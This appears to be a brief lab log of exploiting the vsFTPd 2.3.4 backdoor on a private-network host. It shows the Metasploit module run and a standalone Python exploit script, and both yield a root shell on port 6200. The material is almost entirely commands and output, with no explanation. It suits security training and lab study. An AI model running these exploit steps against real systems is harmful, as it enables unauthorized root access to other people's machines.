With Metasploit ========================

[200~Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  192.168.1.38     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT   21               yes       The target port (TCP)


Payload options (cmd/unix/interact):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit 

[*] 192.168.1.38:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.1.38:21 - USER: 331 Please specify the password.
[+] 192.168.1.38:21 - Backdoor service has been spawned, handling...
[+] 192.168.1.38:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (192.168.1.39:33741 -> 192.168.1.38:6200 ) at 2021-12-18 05:10:59 -0500



id
uid=0(root) gid=0(root)

Without Metasploit ========================


└─$ python3 vsftpd_234_exploit.py 192.168.1.38 21 whoami                                                                                                                                                                                 1 ⨯
[*] Attempting to trigger backdoor...
[+] Triggered backdoor
[*] Attempting to connect to backdoor...
[+] Connected to backdoor on 192.168.1.38:6200
[+] Response:
root

